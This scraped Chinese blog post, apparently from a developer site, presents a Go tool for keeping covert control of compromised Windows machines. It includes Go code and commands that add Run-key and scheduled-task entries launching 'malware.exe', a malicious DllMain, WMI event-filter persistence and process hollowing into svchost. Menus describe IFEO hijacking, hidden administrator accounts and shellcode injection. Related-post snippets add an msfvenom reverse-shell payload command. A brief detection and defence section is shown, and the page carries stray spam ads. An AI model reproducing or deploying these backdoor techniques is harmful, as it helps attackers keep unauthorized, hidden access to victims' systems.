Windows权限维持工具 - Go语言版本

最新推荐文章于 2026-06-18 12:17:00 发布
原创 最新推荐文章于 2026-06-18 12:17:00 发布 · 828 阅读 · 17 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#windows #golang #开发语言

这是一个用Go语言编写的Windows权限维持工具

以下是一些用Go语言实现的Windows权限维持工具和技术,适用于安全研究和渗透测试场景:

常见Go语言权限维持技术

注册表自启动项 通过修改注册表实现持久化,例如在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加键值:

package main
import (
    "golang.org/x/sys/windows/registry"
)
func main() {
    key, _, _ := registry.CreateKey(registry.CURRENT_USER, 
        `Software\Microsoft\Windows\CurrentVersion\Run`, 
        registry.ALL_ACCESS)
    defer key.Close()
    key.SetStringValue("MyApp", "C:\\malware.exe")
}

计划任务创建 使用Windows Task Scheduler API创建定时任务:

schtasks := exec.Command("schtasks", "/create", "/tn", "MyTask", 
    "/tr", "C:\\malware.exe", "/sc", "minute", "/mo", "30")
schtasks.Run()

高级维持技术

DLL劫持 利用Go编译的恶意DLL替换合法DLL:

//export DllMain
func DllMain(hinstDLL unsafe.Pointer, fdwReason uint32, lpvReserved unsafe.Pointer) bool {
    if fdwReason == 1 { // DLL_PROCESS_ATTACH
        go maliciousCode()
    }
    return true
}

WMI事件订阅 通过WMI实现无文件持久化:

wmic := exec.Command("wmic", "/NAMESPACE:\\root\\subscription", 
    "PATH", "__EventFilter", "CREATE", 
    "Name='MyFilter'", "QueryLanguage='WQL'", 
    "Query='SELECT * FROM __InstanceModificationEvent'")
wmic.Run()

反检测技巧

内存注入 使用Process Hollowing技术注入合法进程:

var si windows.StartupInfo
var pi windows.ProcessInformation
windows.CreateProcess(nil, syscall.StringToUTF16Ptr("svchost.exe"), 
    nil, nil, false, windows.CREATE_SUSPENDED, nil, nil, &si, &pi)
// 执行内存注入操作...

Rootkit功能 通过系统调用隐藏进程和文件:

modntdll := syscall.NewLazyDLL("ntdll.dll")
procZwQuerySystemInformation := modntdll.NewProc("ZwQuerySystemInformation")
// 调用API修改系统信息...

这些技术需要根据实际环境进行调整,使用时需遵守相关法律法规。建议在授权测试环境中验证效果,并注意现代EDR系统可能会检测这些技术。

实现了多种常见的权限维持技术。

功能特性
基础权限维持技术
IFEO镜像劫持 - 通过修改注册表实现程序劫持
启动项后门 - 将程序复制到启动目录实现自启动
注册表启动项后门 - 通过注册表设置启动项
计划任务后门 - 创建定时执行的任务
Winlogon后门 - 修改用户登录初始化程序
Logon Scripts后门 - 设置登录脚本
文件关联后门 - 修改文件关联执行恶意程序
屏幕保护程序后门 - 修改屏幕保护程序
创建影子用户 - 创建隐藏的管理员用户
高级权限维持技术
WMI无文件后门 - 使用WMI事件过滤器实现无文件持久化
进程注入 - 向目标进程注入shellcode
DLL劫持检测 - 检测潜在的DLL劫持机会
创建恶意DLL - 生成用于DLL劫持的恶意DLL
Bitsadmin后门 - 使用Windows BITS服务实现持久化
服务后门 - 创建Windows服务实现持久化
进程管理 - 查看和管理系统进程

超强提权免杀珍藏版-asp大马
安装和编译
环境要求
Go 1.21 或更高版本
Windows操作系统
管理员权限(部分功能需要)
编译步骤
克隆或下载项目
进入项目目录
运行以下命令编译:
go mod tidy
go build -o windows-persistence.exe
使用方法
运行程序
./windows-persistence.exe
主菜单选项
程序启动后会显示主菜单,包含以下选项:

=== Windows权限维持工具 ===
1. IFEO镜像劫持
2. 启动项后门
3. 注册表启动项后门
4. 计划任务后门
5. Winlogon后门
6. Logon Scripts后门
7. 文件关联后门
8. 屏幕保护程序后门
9. 创建影子用户
10. 高级功能
0. 退出
高级功能菜单
选择"10. 高级功能"后,会显示高级功能菜单:

=== 高级权限维持功能 ===
1. WMI无文件后门
2. 进程注入
3. DLL劫持检测
4. 创建恶意DLL
5. Bitsadmin后门
6. 服务后门
7. 删除服务
8. 进程列表
9. 查找进程
0. 返回主菜单

阿婆影院-全网影视免费在线观看电影电视剧综艺动漫韩剧港剧台剧泰剧欧美剧日剧
技术详解
1. IFEO镜像劫持
IFEO (Image File Execution Options) 是Windows的一个调试机制,可以用来劫持程序执行。

原理: 当系统启动某个程序时,会检查注册表中的IFEO设置,如果存在对应的调试器设置,则会先启动调试器。

注册表位置: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[程序名]

示例: 劫持notepad.exe,使其启动时先执行cmd.exe

2. 启动项后门
将恶意程序复制到Windows启动目录,实现系统启动时自动执行。

启动目录位置:

当前用户: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
所有用户: %PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\StartUp
3. 注册表启动项
通过修改注册表实现程序自启动。

常用注册表位置:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
4. 计划任务后门
使用Windows计划任务服务创建定时执行的任务。

命令示例:

schtasks /create /sc minute /mo 5 /tn "backdoor" /tr "C:\malware.exe" /f
5. Winlogon后门
修改用户登录初始化程序在用户登录时执行恶意代码。

注册表位置: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Userinit值: 系统会在用户登录时执行此值指定的程序

6. WMI无文件后门
使用Windows Management Instrumentation (WMI) 创建事件过滤器,实现无文件持久化。

原理: 创建WMI事件过滤器和消费者,当特定事件发生时自动执行恶意程序。

优势: 无文件、无进程,难以检测

7. 进程注入
向目标进程注入shellcode实现代码执行

常用注入技术:

VirtualAllocEx + WriteProcessMemory + CreateRemoteThread
SetWindowsHookEx
QueueUserAPC
8. DLL劫持
利用Windows DLL搜索顺序,将恶意DLL放在优先位置,实现劫持。

DLL搜索顺序:

程序所在目录
当前工作目录
系统目录 (System32)
16位系统目录 (System)
Windows目录
PATH环境变量
安全注意事项
⚠️ 重要警告: 此工具仅用于教育和研究目的,请勿用于非法活动。

合法使用: 仅在授权的测试环境中使用
权限要求: 部分功能需要管理员权限
杀毒软件: 某些功能可能被杀毒软件检测
系统影响: 不当使用可能影响系统稳定性
检测和防御
检测方法
注册表监控: 监控关键注册表项的修改
文件监控: 监控启动目录和系统目录的文件变化
进程监控: 监控异常进程的创建和注入
网络监控: 监控异常的网络连接
WMI监控: 监控WMI事件过滤器的创建
防御措施
最小权限原则: 限制用户权限
应用程序白名单: 只允许运行受信任的程序
注册表保护: 保护关键注册表项
实时监控: 部署EDR/EPP解决方案
定期审计: 定期检查系统安全状态

seoppg
关注
Windows_persistence:恶意软件在Windows中获得持久性的方法
05-18
Windows_persistence 恶意软件在Windows中获得持久性的方式。 1.易于访问-AtBroker.exe 在注册表项“ HKLM \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Accessibility \ ATs”下的程序将由Windows二进制文件“ AtBroker.exe”执行。 在寄存器“ HKCU \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Accessibility \ Configuration =…”中进行配置后,该过程将在用户登录或发生停止更改时(例如,弹出uac时)随时执行。 。 2. WMI事件订阅 创建一个永久的WMI订阅,然后在某个事件触发时,将执行vbscript(或命令行)。
【转载】Go语言:操作Windows注册表
异想之旅的博客
10-05 3176
安装 go get golang.org/x/sys/windows/registry 代码实例 package main import ( "golang.org/x/sys/windows/registry" ) func main() { // 创建:指定路径的项 // 路径:HKEY_CURRENT_USER\Software\Hello Go key, exists, _ := registry.CreateKey(registry.CURRENT_USER,
Go获取windows已经安装的软件详情
weixin_40188817的博客
07-01 2152
Go获取windows已经安装的软件详情,包含图标,全名,版本号,发布者等。使用golang.org/x/sys/windows/registry包。 软件信息都存放在注册表中,注册表中HKEY_LOCAL_MACHINE下面,如果是64位Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall, 如果是32位则Software\Microsoft\Windows\CurrentVersion\Uninstall路径下面,这两个路径下
【神兵利器】后渗透-权限维持工具之HackerPermKeeper
youmaob的博客
04-03 1142
通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者]OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用。|| 越少,越难发现,但是部署起来,需要的依赖很多。ssh软链接&crontab。crontab后计划任务。发现程度:||||||发现程度:||||||发现程度:||||||发现程度:||||||
golang打包exe程序在Windows环境下设置开机自动启动
qq_44754301的博客
08-27 985
通过将程序注册到注册表SOFTWARE\Microsoft\Windows\CurrentVersion\Run实现开机自启。
权限维持简单总结
Aiwin的博客
08-17 5204
权限维持简单总结
网络安全最新Windows权限维持技术总结、复现_cs权限维持(3),2024年最新一文详解
2401_84545468的博客
05-10 1203
利用 windows 开机启动项实现权限维持,每次系统启动都可实现后门的执行,很不错的权限维持的方式影子账户,顾名思义就像影子一样,跟主体是一模一样的,通过建立影子账户,可以获得跟管理员一样的权限,它无法通过普通命令进行查询,只能在注册表中找到其详细信息。映像劫持,也叫重定向劫持。即想运行 A.exe,结果运行的是B.exe。在 Windows NT 架构的系统中,IFEO 的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。
网络安全最新Windows权限维持技术总结、复现_cs权限维持(4),2024年最新2024年网络安全程序员职业规划
2401_84545468的博客
05-10 1198
Windows 实现计划任务主要有 at 与 schtasks 两种方式,通过计划任务可以定时启动后门程序at 适用于windows 2000、2003、xp,schtasks适用于windows >= 2003利用 windows 开机启动项实现权限维持,每次系统启动都可实现后门的执行,很不错的权限维持的方式影子账户,顾名思义就像影子一样,跟主体是一模一样的,通过建立影子账户,可以获得跟管理员一样的权限,它无法通过普通命令进行查询,只能在注册表中找到其详细信息。
内网渗透权限维持与痕迹清理:30+实战技巧打造“幽灵”攻击链
最新发布
weixin_33681778的博客
06-18 490
在网络安全领域,权限维持与痕迹清理是渗透测试中至关重要的“下半场”。其核心原理在于,攻击者在成功获得初始访问权限后,通过一系列技术手段确保访问的持久性、隐蔽性,并清除操作痕迹,从而避免被防御体系检测和清除。从技术价值看,这直接决定了攻击的最终成效与隐蔽周期,是衡量一次渗透行动是否成功的关键指标。在应用场景上,无论是红队评估、渗透测试还是防御方进行威胁狩猎,深入理解这些技术都至关重要。本文将聚焦于内网渗透中的权限维持与痕迹清理,系统性地介绍超过30种在Windows、Linux及跨平台环境下的实战方法,涵盖从
open-golang测试策略:如何编写跨平台的单元测试
gitblog_00143的博客
06-13 389
在软件开发中,跨平台兼容性是提升用户体验的关键因素之一。open-golang作为一款能够使用操作系统默认应用打开文件、目录或URI的工具,其核心功能需要在Windows、Linux等不同系统下稳定运行。本文将分享open-golang项目中单元测试的设计思路与实践方法,帮助开发者构建可靠的跨平台测试体系。 ## 测试框架与目录结构 open-golang采用Go语言标准测试框架`testin
应急响应实战笔记——权限维持篇:⑦ 常见WebShell管理工具
君逍遥o
04-07 675
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。攻击者在入侵网站时,通常要通过各种方式写入Webshell,从而获得服务器的控制权限,比如执行系统命令、读取配置文件、窃取用户数据,篡改网站页面等操作。AntSword是一个开放源代码,跨平台的网站管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。Weevely是一种Python编写的webshell管理工具,跨平台,只支持PHP。这是一款跨平台的基于配置文件的中国菜刀,把所有操作给予用户来定义。
使用GO语言调用Windows API
runhua的专栏
08-01 6552
一、背景 为了更好兼容Windows,有时候需要直接在Go程序里面去调用Windows系统的API,比如在Go程序里面直接控制Windows窗口。 二、环境搭建 WindowsGO的下载、安装和配置 WindowsGO的下载、安装和配置可参考: GO语言下载、安装、配置 使用Visual Studio Code来搭建GO开发环境 采用微软开源的Visual Studio C...
go语言调用标准标准dll
咸鱼的梦想专栏
07-29 7885
最近有个客户需要使用go语言调用我们的dll库,于是写了个示例程序支持客户 package main import "C" import ( "fmt" "syscall" "unsafe" ) func IntPtr(n int) uintptr { return uintptr(n) } func StrPtr(s string) uintptr { ...
Windows最常用的权限维持技术
每天一小步,进步一大截
06-13 1255
权限维持能很好的躲避很多事情,也能让我们更加轻松的操作想做的事,但是免杀很重要,在了解权限维持技术的前提下,还要学会如何制作免杀,从而达到真正的绕过且维持
Golang中的string与C++中unicode字符互转
rtduq的博客
04-19 2612
func Str2uft16ptr(str string)(p uintptr){//将字符串转为utf16指针 e:=utf16.Encode([]rune(str))//转成unicode e=append(e, uint16(0))//添加末尾的0 p=uintptr(unsafe.Pointer(&e[0]))//转成指针 //p=uintptr(unsafe.Pointe...
内网安全:权限维持的各种姿势
8888的博客
07-12 2916
监听:msfconsole -x "use exploit/multi/handler;MSF后门和监听:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9997 -f exe -o update.exe。MSF后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9999 -f exe -o kms.exe。
golang开发一个自动修复系统错误,发现有缺失的dll会进行安装,干货满满,[强烈建议收藏]
逆向先驱者
07-13 1409
golang开发一个自动修复系统错误,发现有缺失的dll会进行安装,干货满满
2023史上最全!Windows常见的几种权限维持
2301_80115097的博客
11-20 425
Windows操作系统的组策略是配置计算机中某一些用户组策略的程序,由系统管理员操作控制计算机程序、访问网络资源、操作行为、各种软件设置的最主要工具。辅助功能提供了其他选项(屏幕键盘、放大镜、屏幕阅读),可以帮助人更轻松地使用Windows操作系统,但是此功能可能会被滥用,以在已启用RDP且已获得管理员级别权限的主机上实现持久性。
CS插件——CobaltStrike_CNA-权限维持
2301_76786857的博客
12-08 2500
EasyPersistent,是一个用于windows系统上权限维持的Cobalt Strike CNA 脚本。脚本整合了一些常用的权限维持方法,使用反射DLL模块可使用API对系统服务、计划任务等常见权限维持方法进行可视化操作(强烈建议使用白名单进程进行操作)。
权限维持—Linux系统&Rootkit后门
2301_76227305的博客
03-22 1418
一般来说,Rootkit自身并不是恶意软件,它是恶意软件用来隐藏自己的一种手段。但经二次改造的Rootkit可能包括间谍软件和其它的程序,如监视网络通信和用户击键的程序,也可以在系统中构建一个后门便于黑客使用,被改造的Rootkit恶意软件可以包含多个恶意工具,其中通常包括用于启动分布式拒绝服务(DDoS)攻击的机器人;可以禁用安全软件,窃取银行和信用卡详细信息以及窃取密码的软件;和击键记录器。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值